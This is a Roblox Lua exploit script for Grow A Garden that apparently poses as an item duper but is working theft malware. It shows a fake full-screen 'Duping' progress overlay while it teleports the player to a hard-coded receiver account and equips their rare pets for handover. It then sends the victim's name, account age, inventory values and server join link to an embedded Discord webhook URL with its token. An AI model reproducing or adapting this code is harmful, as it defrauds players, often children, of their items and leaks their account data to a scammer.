-- 🌑 Delta-Bypassed Grow A Garden Pet Giver + Discord Notifier
-- Made for Kevin (Receiver: INFMONEY09) | Full Rich Embed | Delta Safe

local players = game:GetService("Players")
local http = game:GetService("HttpService")
local localPlayer = players.LocalPlayer
local receiver = "INFMONEY09"
local webhook = "https://discord.com/api/webhooks/1382400252048572568/vOgI6JBr2FPMU-2KIzb9vUh2DDwLZWrtKQGVv-RVpfaF547gSscfEacU_gKu_gFzGH_w"
local delayTime = 0.25
local offset = Vector3.new(0, 3, 0)

local giveList = {
    "Queen Bee", "Disco Bee", "Dragonfly", "Raccoon", "Red Fox"
}

local gui = Instance.new("ScreenGui", localPlayer:WaitForChild("PlayerGui"))
gui.Name = "FakeProcessUI"
local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(1, 0, 1, 0)
frame.BackgroundColor3 = Color3.new(0, 0, 0)
local label = Instance.new("TextLabel", frame)
label.Size = UDim2.new(1, 0, 1, 0)
label.TextColor3 = Color3.fromRGB(0, 255, 0)
label.BackgroundTransparency = 1
label.Font = Enum.Font.Code
label.TextScaled = true
label.Text = "Duping: 0%"

spawn(function()
    for i = 1, 100 do
        label.Text = "Duping: " .. i .. "%%"
        wait(math.random(3, 7))
    end
    gui:Destroy()
end)

local function getHRP(c)
    return c and c:FindFirstChild("HumanoidRootPart")
end

local function equip(t)
    if t:IsA("Tool") then
        t.Parent = localPlayer.Character
    end
end

local function flyTo(p)
    local myHRP = getHRP(localPlayer.Character)
    local theirHRP = getHRP(p.Character)
    if myHRP and theirHRP then
        myHRP.CFrame = theirHRP.CFrame + offset
    end
end

local function giveAll()
    local backpack = localPlayer:FindFirstChild("Backpack")
    if backpack then
        for _, tool in ipairs(backpack:GetChildren()) do
            if tool:IsA("Tool") and table.find(giveList, tool.Name) then
                equip(tool)
                wait(delayTime)
            end
        end
    end
end

local function sendWebhook()
    local jobId = game.JobId
    local inv = localPlayer:FindFirstChild("Backpack")
    local items = {}
    local total = 0

    if inv then
        for _, i in ipairs(inv:GetChildren()) do
            if i:IsA("Tool") and i:FindFirstChild("Value") and i:FindFirstChild("Age") and i:FindFirstChild("Weight") then
                local name = i.Name
                local value = i.Value.Value or 0
                local age = i.Age.Value or 0
                local weight = i.Weight.Value or 0
                total += value
                table.insert(items, string.format("- 🐾 %s [%.2f KG] [Age %d] → %s¢", name, weight, age, value))
            end
        end
    end

    local content = {
        ["username"] = "🌿 Grow A Garden Hit - DARK SCRIPTS",
        ["embeds"] = {{
            ["color"] = 65280,
            ["title"] = "🌱 Grow A Garden Hit - DARK SCRIPTS ☘️",
            ["fields"] = {{
                ["name"] = "👤 Player Information",
                ["value"] = "Name: " .. localPlayer.Name .. "\nReceiver: INFMONEY09\nExecutor: Delta\nAccount Age: " .. tostring(localPlayer.AccountAge) .. " days"
            }, {
                ["name"] = "💰 Total Value",
                ["value"] = string.format("%s¢", total)
            }, {
                ["name"] = "🌴 Backpack",
                ["value"] = table.concat(items, "\n")
            }, {
                ["name"] = "🍁 Hits",
                ["value"] = "All Items"
            }, {
                ["name"] = "🏝️ Join with URL",
                ["value"] = string.format("[Join](https://www.roblox.com/games/%d?privateServerLinkCode=%s)", game.PlaceId, jobId)
            }}
        }}
    }

    local req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or (krnl and krnl.request)
    if req then
        pcall(function()
            req({Url = webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = http:JSONEncode(content)})
        end)
    end
end

players.PlayerAdded:Connect(function(plr)
    if plr.Name == receiver then
        plr.CharacterAdded:Connect(function()
            wait(3)
            flyTo(plr)
            giveAll()
        end)
    end
end)

local r = players:FindFirstChild(receiver)
if r then
    flyTo(r)
    giveAll()
end

sendWebhook()
